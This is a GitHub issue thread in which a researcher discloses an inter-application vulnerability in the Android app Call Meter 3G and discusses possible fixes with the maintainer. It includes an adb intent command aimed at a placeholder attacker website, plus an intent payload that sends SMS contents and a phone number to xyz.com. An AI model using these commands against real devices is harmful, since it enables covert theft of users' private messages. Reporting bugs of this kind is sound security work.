search

felixb / callmeter

Call Meter 3G is the most complete monitor app for your Android device: It monitors your calls, text messages and data usage.
GNU General Public License v3.0
48 stars 39 forks source link

Inter-Application Vulnerability #79

Closed biniamf closed 8 years ago

biniamf commented 8 years ago

Hi there,

This issue report is a part of a research. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:

adb shell 'am start "intent://ATTACKER_WEBSITE_WITH_GET_REQUEST#Intent;scheme=http;action=android.intent.action.VIEW;category=android.intent.category.ALTERNATIVE;component=de.ub0r.android.callmeter/.ui.prefs.Preferences;end"'

By automating this command, an attacking app without INTERNET permission can post sensitive information to the attacker's website.

The problem is in getStream(final ContentResolver cr, final Uri uri) method in class Preferences where the scheme is checked if it's 'http' or 'https' but the data is not checked if it's XML and a connection is open on the uri.

Can you please confirm this?

Thank you, Biniam

felixb commented 8 years ago

Thanks for the bug report. Can you please add some more context on how an attacker would use this? The thing is, even if I check for an XML in the response, the attacker still could send any data, right? Any idea how to fix this?

biniamf commented 8 years ago

Ok here is a simple context. Let's say the malicious app has permission to access sensitive data (e.g., it can read SMS) but not INTERNET permission. Then the malicious app can send this sensetive data to the attackers by sending an explicit intent request to your app with the following details:

{ "action": "android.intent.action.VIEW", "category": "android.intent.category.ALTERNATIVE", "className": ".ui.prefs.Preferences", "componentName": "de.ub0r.android.callmeter", "host": "xyz.com/p.php?phoneno=123&sms=leaked_sms_message&other_sensitive_data=here", "protocol": "http" }

which will make your app be used to leak information. In order to simply try this, you can set up a simple web server (or online with free hosting) and use the above ADB command by modifying the ATTACKER_WEBSITE_WITH_GET_REQUEST with appropriate URL (e.g., xyz.com/p.php?phoneno=123...).

About fixing:

You are right, checking for an XML will not change anything. Off the top my head, a simple solution could be sanitizing the URL before calling HttpURLConnection con = (HttpURLConnection) new URL(url).openConnection();

For example checking if (url.Query() != null) and then stopping if it is not null.

Wouldn't it work?

-Biniam

felixb commented 8 years ago

checking for query params won't change anything. the attacker might choose regular pathes or something similar.

basically, I need to support arbitrary urls anyway. I don't want to put on restrictions, where users can host their rule sets.

btw: isn't it easier for an attacker to just use the build in browser to push out data the way you described?

biniamf commented 8 years ago

Yes the default browser is a known case: http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-android-permissions-what-you-need-to-know/ but it's a bit different because it cannot be used if the device is locked or screen is off. Apart from that it can be used in the same way without having internet permission.